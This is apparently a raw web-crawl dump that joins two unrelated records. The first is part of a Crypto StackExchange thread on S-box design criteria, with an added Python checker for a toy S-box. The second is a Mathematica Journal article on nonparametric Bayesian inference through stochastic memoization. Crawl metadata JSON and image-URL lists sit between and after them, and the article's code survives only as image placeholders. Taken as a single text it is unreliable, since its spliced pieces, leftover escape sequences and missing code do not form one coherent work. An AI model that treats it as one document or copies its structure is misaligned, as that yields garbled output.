f\n\nR6: The S-boxes were chosen to minimize the difference between the number of 1's and 0's in any S-box output when any single input is held constant\n\nR7: The S-boxes chosen require significantly more minterms than a random choice would require\n\nFor Rijndael, things were different as the S-Box in Rijndael had to meet certain requirements mathematically and cryptanalytically\n\n• Could you explain criteria R5 and R7, please? And is criteria R2 essentially \"No S[x] must exist for x where the result is a rotation of x, e.g. 01010010 -> 10010100\"? – Polynomial Nov 24 '11 at 6:58\n• @Polynomial: There are many more linear and affine functions than just rotations. Basically, R2 says (assuming the mean linear/affine over $\\{0,1\\}$) that no S-box may be writable as $S(x) = a_0 \\oplus a_1x_1 \\oplus \\dotsb \\oplus a_nx_n$, where $x_1 \\dotsc x_n$ are the bits of $x$ and $a_0 \\dotsc a_n$ are arbitrary bitstrings. 
– Ilmari Karonen Nov 24 '11 at 12:16\n\n# Desirable Properties\n\nFor simplicity, I’m skipping some of the details here… but the main criteria of a good s-box are:\n\n• It should have balanced component functions,\n• The non-linearity of its component functions should be high,\n• The non-zero linear combinations of its component functions should be balanced and highly non-linear,\n• It should satisfy SAC (strict avalanche criterion),\n• It should have a high algebraic degree.\n\nYet, it’s hardly possible to achieve all those goals 100%. Nevertheless, there is somewhat of a consensus on what properties an “Ideal S-Box Properties” would possess…\n\n# Ideal S-Box Properties\n\n• All linear combinations of s-box columns are bent.\n• All entries in the s-box XOR table are 0 or 2.\n• The s-box satisfies MOSAC (aka „Maximum order SAC“).\n• The s-box satisfies MOBIC (aka “Maximum order BIC”).\n• The set of weights of rows has a binomial distribution with mean $$m / 2$$.\n• The set of weights of all pairs of rows has a binomial distribution with mean $$m / 2$$.\n• The columns each have Hamming weight $$2^{(n− 1)}$$.\n\nAt least, that would be the expected properties in an ideal world.\n\nPractically, making sure s-boxes satisfy all desired properties is hard already and working towards satisfying all “ideal” properties is definitely a goal, but chances are you might not reach all “ideal” goals to your fullest satisfaction. Especially when cryptography isn’t your day job where you happen to have plenty of R&D resources to back your efforts.\n\nI guess this also explains to you why they call it “designing” s-boxes. Fact is, you can’t just throw some shuffled byte-values into a 2D array and expect s-box creation to be completed. An s-box is a part of the cipher you create it for. An s-box is meant to add security. Depending on the individual cipher algorithm design, a low-quality s-box can break the neck of each and every person that might use the cipher. Therefore, it’s utterly important that you don’t mess things up along the lines of “oh, that 2D array of values looks random enough to me”.\n\n# Make No Mistake – S-Boxes Are Not Random\n\nYou have to realize that the most important thing an s-box adds to a block cipher is “non-linearity“. And you can trust in the fact that the chances that you’ll manage to create a good s-box randomly by using your current criteria are very minimal… very, very minimal!\n\nSee, an s-box is not just a randomly permuted set of values (may it be bits, words, integers, or whatever) with some equalized bits to make it look somewhat balanced. Creating s-boxes can be seen as a mathematical design step. It involves working with and checking on things like boolean functions, truth tables, hamming weights, the distance between the function and the set of all affine functions, etc.\n\nIn short: an s-box is not something you quickly wrap up in an afternoon, and it’s certainly not something you can create “randomly” or with the specifics you’ve defined. The reason is simple: your whole block cipher depends on the non-linearity and other characteristics of that s-box. Such s-boxes are rare, while the rest of potential combinations is either linear or completely distinguishable from randomness. As you might have read here and there: if an adversary can pinpoint one or more distinguishers, the adversary gains knowledge that can potentially be used to successfully break a way into your ciphertext. Cipher algorithms using s-boxes rely on s-box non-linearity to be secure. 
If you replace the s-box(es) without knowing what you're doing, you risk breaking a once perfectly secure cipher by removing its heart.\n\nPlease, do not simply create a random s-box that fits your listed criteria and throw it into some cipher algorithm. The chance that you introduce a wide-open door for attackers is too big to even consider it.\n\n# Literature\n\nTo be sure you get the right idea about what an s-box is and how s-boxes are created, I would like to point you to the following papers:\n\nPersonally, I'd like to advise you to start reading “The Design Of S-Boxes” by Cheung, as that will most probably make it easier for you to grasp the whole concept… while getting a clear picture of what you might already know and what you still need to do some research on. After all, there are dozens of papers out there that handle s-box design. Depending on your personal knowledge level, you'll surely find yourself reading additional papers that handle certain specifics of s-box design and analysis.\n\n### Get The Picture\n\nIf you want to dive in head-first and quickly see what I'm talking about, visit YouTube at “Mod-01 Lec-17 Overview on S-Box Design Principles” where Prof. Mukhopadhyay (Department of Computer Science and Engineering, IIT Kharagpur) roughly explains it. Even if you can't follow him, it'll surely give you a good first impression of why s-box design is a bit more complicated than randomly shuffling an array.\n\n• I have not seen an s-box that satisfies SAC, the target is to minimize the distance from SAC in the negative direction, and maximize the number of entries in the strict avalanche table that meet or exceed $2^{n-1}$ – Richie Frame Sep 2 '14 at 3:45\n• @RichieFrame Honestly, it doesn't surprise me you haven't seen them yet (for example: DES and AES s-boxes don't satisfy SAC). But nevertheless, I think we're talking somewhat about the same thing here. See, I never said all criteria can be attained to their maximum effect. It's well known that we can't achieve all good properties we would like. In practice, we have to decide which properties are more important. (As D.W. correctly noted in his answer: it depends on the application.) But that doesn't change the list of desirable properties. – e-sushi Sep 2 '14 at 15:29\n• What do you mean by \"component functions\"? – Melab Jan 19 '18 at 2:12\n• @Melab Component functions are the linear combinations (with non all-zero coefficients) of the coordinate functions of the S-box. Their set is the vector space spanned by the coordinate functions, deprived of the null function if the coordinate functions are F2-linearly independent. For further reading, use your favorite search engine and look for \"s-box component functions\". – e-sushi Jan 19 '18 at 5:05\n\nIt depends on how you plan to use your S-box. Presumably you are going to use your S-box in some block cipher. In that case, you have to look at what properties you need from the S-box, and then generate the S-box accordingly.\n\nYou can't separate the design of the S-box from the design of the rest of the cipher. There is no universal set of criteria that make for a good S-box. For instance, AES had one set of criteria for their S-boxes. 
DES had a totally different set of criteria.\n\nCriteria of a good S-box:\n\n• Balanced component functions\n\n• High non-linearity of component functions\n\n• Non-zero linear combinations of component functions balanced and highly non-linear\n\n• Satisfies SAC\n\n• High algebraic degree\n\nHope it helps\n\n• I don't think that this is helpful if you don't supply any information that supports your claim. – miracle173 Jul 20 '16 at 10:19\n• Not only is any kind of logical reasoning missing from this list, the keywords also are too unspecific to add any new information. Considering there are already well-written answers and this is the 3rd revival of the question (see answer dates), five years after the question, this seems a little pointless. – tylo Jul 21 '16 at 13:38\n\nI would just like to add that another important property of S-boxes when used directly on input (e.g. in Substitution-Permutation networks) is resistance to differential cryptanalysis. Differential cryptanalysis depends on the fact that a certain differential characteristic between two chosen inputs (I0 and I1) propagates to a differential characteristic between two outputs. A wonderful demonstration and easy-to-understand explanation can be seen here, where a flawed S-box is generated to demonstrate this fact. There are very few good S-boxes; for instance, 4-bit S-boxes were all enumerated, of which only 16 optimal ones were found (and among those, a few that are most optimal). This means that out of a possible 16! (approx. 2^44.2) only 2^4 acceptable ones were found." ]
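None of the answers include code for screening candidate S-boxes. As a rough illustration of a few of the cheap checks discussed above (bijectivity, fixed points, output-bit balance, and the XOR/difference table behind differential cryptanalysis), here is a hedged Python sketch; the 4-bit values are row 0 of the DES S1 table, used purely as sample data, and passing these checks alone does not make an S-box secure:

```python
# Toy 4-bit S-box: row 0 of the DES S1 table, used here only as sample data.
SBOX = [0xE, 0x4, 0xD, 0x1, 0x2, 0xF, 0xB, 0x8,
        0x3, 0xA, 0x6, 0xC, 0x5, 0x9, 0x0, 0x7]
N = 4                  # input/output width in bits
SIZE = 2 ** N
MASK = SIZE - 1

# Bijectivity: every output value occurs exactly once.
print("bijective:", sorted(SBOX) == list(range(SIZE)))

# Fixed points S[a] == a and complemented fixed points S[a] == ~a.
print("fixed points:", [a for a in range(SIZE) if SBOX[a] == a])
print("complement fixed points:", [a for a in range(SIZE) if SBOX[a] == (~a & MASK)])

# Balance: each output bit should be 1 for exactly half of all inputs.
for i in range(N):
    ones = sum((SBOX[a] >> i) & 1 for a in range(SIZE))
    print(f"output bit {i}: {ones}/{SIZE} ones")

# Differential uniformity: largest entry in the XOR (difference) table,
# excluding the trivial zero input difference -- smaller is better.
max_dd = max(
    max(sum(1 for a in range(SIZE) if SBOX[a] ^ SBOX[a ^ dx] == dy)
        for dy in range(SIZE))
    for dx in range(1, SIZE))
print("differential uniformity:", max_dd)
```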
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9162176,"math_prob":0.91570544,"size":5210,"snap":"2020-34-2020-40","text_gpt3_token_len":1168,"char_repetition_ratio":0.10007683,"word_repetition_ratio":0.029478459,"special_character_ratio":0.21880998,"punctuation_ratio":0.08521058,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9557624,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-19T09:30:17Z\",\"WARC-Record-ID\":\"<urn:uuid:e160fb9a-7d04-4658-9175-6b1ed12bf69e>\",\"Content-Length\":\"192954\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:706454ef-2e0c-4a58-a240-965504611b9c>\",\"WARC-Concurrent-To\":\"<urn:uuid:ed069ee6-d410-4247-8442-a1f3a884810e>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://crypto.stackexchange.com/questions/1297/desirable-s-box-properties?noredirect=1\",\"WARC-Payload-Digest\":\"sha1:XDNC3U6FG5SSMWJ2NNOLD73FLEZEZZOH\",\"WARC-Block-Digest\":\"sha1:UGY5SGH7B7IRFC72HTST7XBE34XQNBVM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400191160.14_warc_CC-MAIN-20200919075646-20200919105646-00425.warc.gz\"}"}
https://www.mathematica-journal.com/2014/01/09/probabilistic-programming-with-stochastic-memoization/
[ "John Cassel\n\n## Probabilistic Programming with Stochastic Memoization", null, "NB", null, "CDF", null, "PDF\n\n### Implementing Nonparametric Bayesian Inference\n\nProbabilistic programming is a programming language paradigm receiving both government support and the attention of the popular technology press . Probabilistic programming concerns writing programs with segments that can be interpreted as parameter and conditional distributions, yielding statistical findings through nonstandard execution. Mathematica not only has great support for statistics, but has another language feature particular to probabilistic language elements, namely memoization, which is the ability for functions to retain their value for particular function calls across parameters, creating random trials that retain their value. Recent research has found that reasoning about processes instead of given parameters has allowed Bayesian inference to undertake more flexible models that require computational support. This article explains this nonparametric Bayesian inference, shows how Mathematica‘s capacity for memoization supports probabilistic programming features, and demonstrates this capability through two examples, learning systems of relations and learning arithmetic functions based on output.\n\n### Nonparametric Bayesian Inference\n\nBayesian statistics are an orderly way of finding the likelihood of a model from data, using the likelihood of the data given the model. From spam detection to medical diagnosis, spelling correction to forecasting economic and demographic trends, Bayesian statistics have found many applications, and even praise as mental heuristics to avoid overconfidence. However, at first glance Bayesian statistics suffer from an apparent limit: they can only make inferences about known factors, bounded to conditions seen within the data, and have nothing to say about the likelihood of new phenomena . In short, Bayesian statistics are apparently withheld to inferences about the parameters of the model they are provided.\n\nInstead of taking priors over factors of the model itself, we can say that we are taking priors over factors in the process involving how the data was generated. These stochastic process priors give the modeler a way to talk about factors that have not been directly observed. These nonobservable factors include the likely rate at which further factors might be seen, given further observation and underlying categories or structures that might generate the data being observed. For example, in statistics problems we are often presented with drawing marbles of different colors from a bag, and given randomly drawn samples, we might talk about the most likely composition of the bag and the range of likely compositions. However, suppose we had a number of bags, and we drew two marbles each from three of them, discovering two red marbles, two green marbles, and two yellow marbles . If we were to draw marbles from yet another bag, we might expect two marbles identical in color, of a color we have not previously observed. We do not know what this color is, and in this sense we have made a nonparametric inference about the process that arranged the marbles between bags.\n\nThe ability to talk about nonobserved parameters is a leap in expressiveness, as instead of explicitly specifying a model for all parameters, a model utilizing infinite processes expands to fit the given data. 
This should be regarded similarly to the advantages afforded by linked data structures in representing ordinary data. A linked list has a potentially infinite capacity; its advantage is not that we have an infinite memory, but an abstract flexibility to not worry too much about maintaining its size appropriately. Similarly, an infinite prior models the growth we expect to discover .\n\nHere are two specific processes that are useful for a number of different problems. These two processes are good for modeling unknown discrete categories and sets of features, respectively. In both of these processes, suppose that we can take samples so that there are no dependencies in the order that we took them, or in other words that the samples are exchangeable. Both of these processes also make use of a concentration parameter,", null, ". As we look at more samples, we expect the number of new elements we discover to diminish, but not disappear, as our observations establish a lower frequency of occurrence for unobserved elements. The concentration parameter establishes the degree to which the proportions are concentrated, with low", null, "indicating a distribution concentrated on a few elements, and high", null, "indicating a more dispersed concentration.\n\nFirst, let us look into learning an underlying system of categories. In a fixed set of categories of particular likelihood, the probability of a given sample in a particular category corresponds to the multinomial distribution, the multiparameter extension of the Bernoulli distribution. The conjugate prior, or the distribution that gives a Bayesian estimate of which multinomial distribution produced a given sample, is the Dirichlet distribution, itself the multivariable extension of the beta distribution. To create an infinite Dirichlet distribution, or rather a Dirichlet process, one can simply have a recursive form of the beta where the likelihood of a given category is", null, ". To use a Dirichlet process as a prior, it is easier to manipulate in the form of a Chinese restaurant process (CRP) . Suppose we want to know the likelihood that the", null, "sample is a member of category", null, ". If the category is new, then that probability corresponds to the size of the concentration parameter in ratio to the count of the samples taken:", null, "The implementation of this function is straightforward. The use of a parameterized random number function allows for the use of the algorithm in common random number comparison between simulation scenarios , as well as for estimation through Markov chain Monte Carlo, about which more will be said later.", null, "", null, "", null, "In the second process, suppose we are interested in the sets of features observed in sets of examples. For example, suppose we go to an Indian food buffet and are unfamiliar with the dishes, so we observe the selected items that our fellow patrons have chosen. Supposing one overall taste preference, we might say that the likelihood of a dish’s being worth selecting is proportional to the number of times it was observed, but if there are not many examples we should also try some additional dishes that were not tried previously. This process, called the Indian buffet process , turns out to be equivalent to a beta process prior . Suppose we want to know the likelihood of whether a given feature", null, "is going to be found in the", null, "sample. 
Then, the likelihoods can be calculated directly from other well-understood distributions:", null, "Both of these processes are suitable as components in mixture models. Suppose we are conducting a phone poll of a city and ask the citizens we talk to about their concerns. Each person will report their various civic travails. We expect for each person to have their own varying issues, but also for there to be particular groups of concern for different neighborhoods and professional groups. In other words, we expect to see an unknown set of features emerge from an unknown set of categories. Then, we might use a CRP", null, "IBP mixture distribution to help learn those categories from the discovered feature sets.\n\nNonparametric inference tasks are particularly suited for computational support. What we would like to do is describe a space of potential mixture models that may describe the underlying data-generation processes and allow the inference of their likelihood without explicitly generating the potential structures of that space. Probabilistic programming is the use of language-specific support to aid in the process of statistical inference. This article shows that Mathematica has features that readily enable the sort of probabilistic programming that supports nonparametric inference.\n\n### Probabilistic Programming\n\nProbabilistic programming is the use of language-specific support to aid in the process of statistical inference. Unlike statistical libraries, the structure of the programming language itself is used in the inference process . Although Mathematica increasingly has the kinds of structures that support probabilistic programming, we are not going to focus on those features here. Instead, we will see how Mathematica‘s natural capacity for memoization allows it to be very easily extended to write probabilistic programs that use stochastic memoization as a key abstraction. In particular, we are going to look at Church, a Lisp-variant with probabilistic query and stochastic memoization constructs . Let us now explain stochastic memoization and then look at how to implement Metropolis-Hastings querying, which uses memoization to help implement Markov chain Monte Carlo-driven inference.\n\n#### Stochastic Memoization\n\nStochastic memoization simply means remembering probabilistic events that have already occurred. Suppose we say that", null, "is the first flip of coin c. In the first call, it may return Heads or Tails, depending on a likelihood imposed to coin c, but in either case it is constrained in later calls to return the same value. Once undertaken, the value of a particular random event is determined.\n\nIn Church, this memoization is undertaken explicitly through its mem operator. Church’s flip function designates a Bernoulli trial with the given odds, with return values 0 and 1. Here is an example of a memoized fair coin flip in Church.\n\n`(define coinflip (mem (lambda (coin flip) (flip 0.5))))`\n\nMathematica allows for a similar memoization by incorporating a Set within a SetDelayed.", null, "Let us now look to a more complicated case. Earlier, we discussed the Dirichlet process. Church supports a DPmem operator for creating functions that when given a new example either returns a previously obtained sample according to the CRP or takes a new sample, depending upon the category assignment, and returns the previously seen argument. Here is a similar function in Mathematica, called GenerateMemCRP. 
Given a random function, we first create a memoized version of that function based on the category index of the CRP. Then, we create an empty initial CRP result, for which a new sample is created and memoized every time a new input is provided, potentially also resampling the provided function if a prediscovered category is provided.", null, "", null, "", null, "For example, let us now take a sampling from categories that have a parameter distributed according to the standard normal distribution. Here we see outputs in a typical range for a standard normal, but with counts favoring resampling particular results according to the sampled frequency of the corresponding category.", null, "", null, "Memoization implies that if we provide the same inputs, we get the same results.", null, "", null, "#### Metropolis-Hastings Querying\n\nInference is the central operation of probabilistic programming. Conditional inference is implemented in Church through its various query operations. These queries uniformly take four sets of arguments: query algorithm-specific parameters, a description of the inference problem, a condition to be satisfied, and the expression we want to know the distribution of given that condition. Let us motivate the need for a Mathematica equivalent to the Church query operator", null, "by explaining other queries that are trivial to implement in Mathematica but that are not up to certain inference tasks.\n\nDirect calculation is the most straightforward approach to conditional inference. However, sometimes we cannot directly compute the conditional likelihood, but instead have to sample the space. The easiest way to do so is rejection sampling, in which we generate a random sample for all random parameters to see if it meets the condition to be satisfied. If it does, its value is worth keeping as a sample of the distribution, and if it does not, we discard it entirely, proceeding until we are satisfied that we have found the distribution we intend.\n\nThere is a problem with rejection sampling, namely that much of the potential model space might be highly unlikely and that we are throwing away most of the samples. Instead of doing that, we can start at a random place but then, at each step, use that sample to find a good sample for the underlying distribution . So, for a sample", null, ", we are interested in constructing a transition operator", null, "yielding a new sample", null, ", and constructing that operator such that for the underlying distribution", null, ", the transition operator is invariant with respect to distribution", null, ", or in other words, that the transition operator forms a Markov chain. For our transition operator, we first choose to generate a random proposal,", null, ", where a simple choice is the normally distributed variation along all parameters", null, ", and then accept that proposal with likelihood", null, ", so that we are incorporating less-likely samples at exactly the rate the underlying distribution would provide. After some initial samples of random value, we will have found the region for which the invariance property holds. Due to the use of applying random numbers to a Markov chain, this algorithm is called Markov chain Monte Carlo, or MCMC.\n\nThe following procedure is intended to be the simplest possible implementation of MCMC using memoization (for further considerations see [13, 14]). 
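(The article's Mathematica code for this procedure survives in this capture only as image placeholders. As a very rough Python sketch of the same Metropolis-Hastings idea described above — a Gaussian proposal of width sigma, accepted at the ratio of the target densities — consider the following; the target density and the constants are illustrative, not the article's.)

```python
import math
import random

def metropolis_hastings(log_p, x0, sigma=0.5, n=10_000):
    """Minimal MCMC sketch: sample from the density exp(log_p), starting
    at x0, using a normal proposal of standard deviation sigma."""
    samples, x = [], x0
    for _ in range(n):
        proposal = x + random.gauss(0, sigma)
        # Accept with probability min(1, p(proposal) / p(x)).
        if math.log(random.random()) < log_p(proposal) - log_p(x):
            x = proposal
        samples.append(x)
    return samples

# Example: sample a standard normal (log-density up to a constant).
draws = metropolis_hastings(lambda x: -0.5 * x * x, x0=0.0)
print(sum(draws) / len(draws))  # should be near 0
```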
There is a trade-off in the selection of", null, ", such that if it is too large, we rarely accept anything and would effectively be undertaking rejection sampling, but if it is too small, we tend to stay in a very local area of the algorithm. One way to manage this trade-off is to control", null, "by aiming for a given rejection rate, which is undertaken here.", null, "", null, "We now see why we constructed the CRP functions to accept random number functions: it lets us create evaluation functions suitable for MCMC.\n\n### Examples\n\nLet us look to see how we might apply these examples. First, we are going to look at the infinite relational model, which demonstrates how to use the CRP to learn underlying categories from relations. Then, we will look at learning arithmetic expressions based upon particular inputs and outputs, which demonstrates using probabilistic programming in a recursive setting.\n\n#### The Infinite Relational Model\n\nSuppose we are given some set of relations in the form of predicates, and we want to infer category memberships based on those relations. The infinite relational model (IRM) can construct infinite category models for processing arbitrary systems of relational data . Suppose now we have some specific instances of objects,", null, ", and a few specific statements about whether a given", null, "-ary relation,", null, ", holds between them or not. Given a prior of how concentrated categories are,", null, ", and a prior for the sharpness of a relation to holding between members of various types,", null, ", we would like to learn categories", null, "and relational likelihoods", null, ", such that we can infer category memberships for objects and the likelihood of unobserved relationships holding between them, which corresponds to the following model structure.", null, "Below we provide a sampler to calculate this, which first sets up memoization for category assignment, next memoization for relational likelihood, and then a function for first evaluating the object to category sampling and then the predicate/category sampling. Then, the function merely calculates the likelihood sampling along the way, returning the object to category memberships and the likelihood.", null, "", null, "To understand how this works, let us look at an example. Suppose that there are two elementary schools, one for girls and one for boys, and that they both join together for high school. However, there is a new teacher who does not know this about the composition of incoming classes. This teacher finds another teacher and asks if they know who knows whom. This more experienced teacher says yes, but not why, and the younger teacher asks a series of questions about who knows whom, to the confusion of the older teacher, who does not understand why the younger teacher does not know (we have all had conversations like this). One potential set of such questions might yield the following answers. Notice that there is a deficiency in these questions; namely, the new teacher never asks if a boy knows a girl.", null, "", null, "Given these samples, let us now perform a Metropolis-Hastings query to see if we can recover these categories. The result of a particular sample is a list of rules, where the left side of each rule is the likelihood of the given predicates to hold given the sampled model, and the right side is the sampled model in a two-element list. 
In this two-element list characterizing the sampled model, the first element is the result as provided by the evaluation method, and the second element contains the random values parameterizing the model.", null, "", null, "Given these samples, let us now find a list of categories that fit them. Normalize the weight of each example by its likelihood, filter out the sampling information, and gather the common results together.", null, "", null, "Removing the specific category assignments and determining for each person whether they are in the same category as each other, we see that we have a complete and accurate estimate for who knows whom.", null, "", null, "#### Learning Simple Arithmetic Expressions\n\nThere is no more idiomatic example of probabilistic programming than probabilistically generated programs. Here, we show how to implement learning simple arithmetic expressions. A Church program for undertaking this is as follows . First, it defines a function for equality that is slightly noisy, creating a gradient that is easier to learn than strict satisfaction. Next, it creates a random arithmetic expression of nested addition and subtraction with a single variable and integers from 0 to 10 as terminals. Then, it provides a utility for evaluating symbolically constructed expressions. Finally, it demonstrates sampling a program with two results that are consistent with adding 2 to the input.", null, "Let us now construct an equivalent Mathematica program. First, we will construct an equivalent noisy equality operator.", null, "", null, "Next, here is an equivalent program for generating random programs. By recursively indexing each potential branch of the program, we can assure that common random number and MCMC algorithms will correctly assign a random number corresponding to that exact part of the potential program. We also explicitly limit the size of the tree.", null, "", null, "Now we make a Metropolis-Hastings query and process the results down to the found expression and its calculated likelihood.", null, "Given only one example, we cannot tell very much, but are pleased that the simplest, yet correct, function is the one rated most likely. Interestingly, the first six expressions are valid despite the noisy success condition.", null, "", null, "With two inputs, the only viable expression is the one found.", null, "", null, "### Summary\n\nWe have now seen how to implement nonparametric Bayesian inference with Mathematica‘s memoization features. Nonparametric Bayesian inference extends Bayesian inference to processes, allowing for the consideration of factors that are not directly observable, creating flexible mixture models with similar advantages to flexible data structures. We see that Mathematica‘s capacity for memoization allows for the implementation of nonparametric sample generation and for Markov chain sampling. This capacity was then demonstrated with two examples, one for discovering the categories underlying particular observed relations and the other for generating functions that matched given results.\n\n### Conclusion\n\nProbabilistic programming is a great way to undertake nonparametric Bayesian inference, but one should not confuse language-specific constructs with the language features that allow one to undertake it profitably. Through Mathematica‘s memoization capabilities, it is readily possible to make inferences over flexible probabilistic models.\n\n### References\n\n DARPA. 
“Probabilistic Programming for Advancing Machine Learning (PPAML).” Solicitation Number: DARPA-BAA-13-31. (Aug 8, 2013) www.fbo.gov/utils/view?id=a7bdf07d124ac2b1dda079de6de2eb78.\n\nB. Cronin. “What Is Probabilistic Programming?” O’Reilly Radar (blog). (Aug 8, 2013) radar.oreilly.com/2013/04/probabilistic-programming.html.\n\nD. Fidler, “Foresight Defined as a Component of Strategic Management,” Futures, 43(5), 2011 pp. 540-544. doi:10.1016/j.futures.2011.02.005.\n\nC. Kemp, A. Perfors, and J. B. Tenenbaum, “Learning Overhypotheses with Hierarchical Bayesian Models,” Developmental Science, 10(3), 2007 pp. 307-321. doi:10.1111/j.1467-7687.2007.00585.x.\n\nM. I. Jordan, “Bayesian Nonparametric Learning: Expressive Priors for Intelligent Systems,” in Heuristics, Probability, and Causality: A Tribute to Judea Pearl, (R. Dechter, H. Geffner, and J. Y. Halpern, eds.) London: College Publications, 2010.\n\nJ. Pitman, Combinatorial Stochastic Processes (Lecture Notes in Mathematics 1875), Berlin: Springer-Verlag, 2006.\n\nA. Law and D. Kelton, Simulation Modeling and Analysis, 3rd ed., Boston: McGraw-Hill, 2000.\n\nT. Griffiths and Z. Ghahramani, “Infinite Latent Feature Models and the Indian Buffet Process,” in Proceedings of the Eighteenth Annual Conference on Neural Information Processing Systems (NIPS 18), Whistler, Canada, 2004. books.nips.cc/papers/files/nips18/NIPS2005_0130.pdf.\n\nR. Thibaux and M. I. Jordan, “Hierarchical Beta Processes and the Indian Buffet Process,” in Proceedings of the Eleventh International Conference on Artificial Intelligence and Statistics (AISTATS 2007), San Juan, Puerto Rico, 2007. jmlr.org/proceedings/papers/v2/thibaux07a/thibaux07a.pdf.\n\nN. D. Goodman. “The Principles and Practice of Probabilistic Programming,” in Proceedings of the 40th Annual ACM SIGPLAN-SIGACT Symposium on Principles of Programming Languages, (POPL 2013) Rome, Italy, 2013 pp. 399-402. doi:10.1145/2429069.2429117.\n\nN. D. Goodman, V. K. Mansinghka, D. Roy, K. Bonawitz, and J. B. Tenenbaum, “Church: A Language for Generative Models,” in Proceedings of the Twenty-Fourth Conference on Uncertainty in Artificial Intelligence (UAI2008), Helsinki, Finland, 2008. www.auai.org/uai2008/UAI_camera_ready/goodman.pdf.\n\nI. Murray. Markov Chain Monte Carlo. (Aug 8, 2013) videolectures.net/mlss09uk_murray_mcmc.\n\nD. J. C. MacKay, Information Theory, Inference, and Learning Algorithms, Cambridge, UK: Cambridge University Press, 2003. www.inference.phy.cam.ac.uk/itila/book.html.\n\nC. Robert and G. Casella, Monte Carlo Statistical Methods, 2nd ed., New York: Springer, 2004.\n\nC. Kemp, J. B. Tenenbaum, T. L. Griffiths, T. Yamada, and N. Ueda, “Learning Systems of Concepts with an Infinite Relational Model,” in Proceedings of the 21st National Conference on Artificial Intelligence (AAAI-06), Boston, MA, 2006. www.aaai.org/Papers/AAAI/2006/AAAI06-061.pdf.\n\nN. D. Goodman, J. B. Tenenbaum, T. J. O’Donnell, and the Church Working Group. “Probabilistic Models of Cognition.” (Aug 8, 2013) projects.csail.mit.edu/church/wiki/Probabilistic_Models_of_Cognition.\n\nJ. Cassel, “Probabilistic Programming with Stochastic Memoization,” The Mathematica Journal, 2014. dx.doi.org/doi:10.3888/tmj.16-1." ]
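The article's Mathematica listings (GenerateMemCRP, the samplers, and the query code) survive in this capture only as image placeholders. As a rough, hedged reconstruction of the central idea — stochastic memoization of draws from a Chinese restaurant process — a Python sketch might look like this; the names and the alpha = 1.0 setting are illustrative, not the article's:

```python
import random

def crp_sampler(alpha, base_sampler, rng=random.Random(0)):
    """DPmem-style stochastic memoization sketch: draw a table index from a
    Chinese restaurant process, memoizing one base_sampler() draw per table
    so that repeated tables reuse their sampled value."""
    counts = []   # customers seated at each table
    values = []   # memoized base draw for each table

    def sample():
        n = sum(counts)
        if rng.random() < alpha / (alpha + n):   # sit at a new table
            counts.append(1)
            values.append(base_sampler(rng))     # memoize a fresh draw
            return values[-1]
        table = rng.choices(range(len(counts)), weights=counts)[0]
        counts[table] += 1                       # join an existing table
        return values[table]

    return sample

# Categories carry a standard-normal parameter, as in the article's example.
draw = crp_sampler(alpha=1.0, base_sampler=lambda rng: rng.gauss(0, 1))
print([round(draw(), 3) for _ in range(10)])  # repeated values = reused categories
```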
[ null, "https://www.mathematica-journal.com/wp-content/themes/tmj/images/download_icon.gif", null, "https://www.mathematica-journal.com/wp-content/themes/tmj/images/download_icon.gif", null, "https://www.mathematica-journal.com/wp-content/themes/tmj/images/download_icon.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_1.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_2.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_3.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_4.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_5.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_6.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_DisplayFormula_1.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_2.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_3.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_4.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_7.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_8.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_DisplayFormula_5.gif", null, "https://reference.wolfram.com/chars/RightArrow.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_9.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_6.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_7.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_8.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_9.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_10.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Output_1.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_11.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Output_2.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_10.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_11.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_12.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_13.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_14.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_15.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_16.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_17.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_18.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_19.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_20.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_12.gif", null, 